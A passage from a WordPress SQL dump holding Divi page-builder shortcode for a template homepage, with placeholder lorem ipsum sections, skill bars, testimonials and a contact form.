custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:00:47','2020-08-07 20:00:47','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(580,1,'2020-08-07 20:02:05','2020-08-07 20:02:05','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" 